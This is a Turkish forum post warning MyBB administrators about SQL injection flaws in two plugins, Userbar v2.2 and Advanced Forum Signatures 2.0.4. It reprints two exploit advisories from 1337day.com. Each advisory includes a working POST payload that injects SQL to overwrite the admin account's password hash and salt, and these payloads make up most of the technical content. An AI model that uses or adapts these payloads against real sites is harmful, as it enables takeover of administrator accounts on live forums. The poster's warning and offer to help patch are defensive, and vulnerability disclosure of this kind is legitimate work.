11.10.2011, Saat: 07:27
Hayırlı Sabahlar.
# 1337day.com [2011-10-10]
# 1337day.com [2011-10-10]
İki Plugin'ide Güvenlik Açıklarını Kapatmadan Kullanmayınız, Henüz Dün Gece Yayınlandı Bunlar, Sql Açığı Mevcut Bu Pluginlerde, Kodlarda Zararlı Karakterleri Filtreleme İşlemi Yapmadan, Kullanmayınız.
Sql Açığıyla Kısa Sürede Admin Bilgilerinize Ulaşabilirler...
Neyse, Kullanan ve Açığı Kapatamayan varsa İletişime Geçebilir, Yardımcı Olurum.
İyi Günler Diliyorum.
Kod:
---------------------------------------------------------------------
Exploit Title : MyBB Forum Userbar Plugin (Userbar v2.2)
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/userbar-plugin
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
>> userbarsettings.php
POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 1337day.com [2011-10-10]
Kod:
http://www.1337day.com/exploits/17047
Kod:
---------------------------------------------------------------------
Exploit Title : MyBB Advanced Forum Signatures (afsignatures-2.0.4)
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/advanced-forum-signatures
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
>> signature.php
POST -> afs_html=<a+href="http://localhost/mybb"><img+src="http://localhost/mybb/signature.php?uid=1"+alt=""+/></a>&afs_bbcode=[url=http://localhost/mybb][img]http://localhost/mybb/signature.php?uid=1[/img][/url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg' WHERE `uid`='1';--
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 1337day.com [2011-10-10]
Kod:
http://www.1337day.com/exploits/17046
İki Plugin'ide Güvenlik Açıklarını Kapatmadan Kullanmayınız, Henüz Dün Gece Yayınlandı Bunlar, Sql Açığı Mevcut Bu Pluginlerde, Kodlarda Zararlı Karakterleri Filtreleme İşlemi Yapmadan, Kullanmayınız.
Sql Açığıyla Kısa Sürede Admin Bilgilerinize Ulaşabilirler...
Neyse, Kullanan ve Açığı Kapatamayan varsa İletişime Geçebilir, Yardımcı Olurum.
İyi Günler Diliyorum.